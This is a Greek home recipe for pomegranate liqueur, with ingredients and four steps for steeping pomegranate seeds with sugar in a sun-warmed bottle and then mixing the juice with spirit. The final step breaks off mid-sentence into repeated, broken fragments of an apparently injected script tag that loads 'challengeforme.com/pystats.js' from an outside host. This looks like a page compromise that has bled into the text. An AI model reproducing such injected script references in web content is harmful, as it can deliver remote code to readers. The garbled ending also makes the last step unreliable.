Φτιάξτε το δικό σας λικέρ από ρόδι

Βήμα-βήμα η εκτέλεση της συνταγής

Υλικά 
– Ρόδι κουκούτσι μπόλικο όσο ένα μπουκάλι πλαστικού νερού του 1 ½ λίτρου

– 1/2 κιλό ζάχαρη αν θέλουμε βάζουμε άλλα 100 γραμμάρια να γίνει ποιο βαρύ το λικέρ μας

– 4 γαρύφαλλα ολόκληρα πρόκες

– οινόπνευμα ποτοποιίας ή βότκα ή τσίπουρο χωρίς γλυκάνισο

Τρόπος παρασκευής – Εκτέλεση συνταγής
1. Παίρνουμε το ρόδι και το καθαρίζουμε και βγάζουμε τα κουκούτσια ρόδι και τα μισά από αυτά τα βάζουμε στο πλαστικό μπουκάλι του νερού. Ρίχνουμε την ζάχαρη και κλείνουμε το καπάκι από το μπουκάλι και ανακατεύουμε καλά, τέλος βάζουμε μέσα τα υπόλοιπα ρόδια κουκούτσια και το γεμίζουμε το μπουκάλι πάρα πολύ καλά και το κλείνουμε πολύ σφιχτά μετά.

2. Το βάζουμε στον ήλιο και μετά από 4 μέρες το συμπληρώνουμε με ρόδι κουκούτσι πάλι, αφήνοντας το για 2 μήνες περίπου ανακατεύοντας το μπουκάλι καλά.

3. Μετά από 2 μήνες περίπου το σουρώνουμε με τούλι βγάζοντας από το μπουκάλι το ρόδι κουκούτσι το οποίο τούλι το έχουμε μέσα σε ένα μπολ διότι θα το σφίξουμε πάρα πολύ καλά να βγει το ζουμί του μέσα στο μπολ και να κρατήσουμε τα κουκούτσια του.

4. Το τοποθετούμε το ζουμί από ρόδι σε ένα γυάλινο μπουκάλι και ζυγίζουμε ίση ποσότητα με οινόπνευμα ποτοποιίας ή με βότκα ή με τσίπουρο και το ρίχνουμε μέσα στο μπουκάλι και το ανακατεύουμε καλά και το κλείνουμε με το καπάκι του… challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >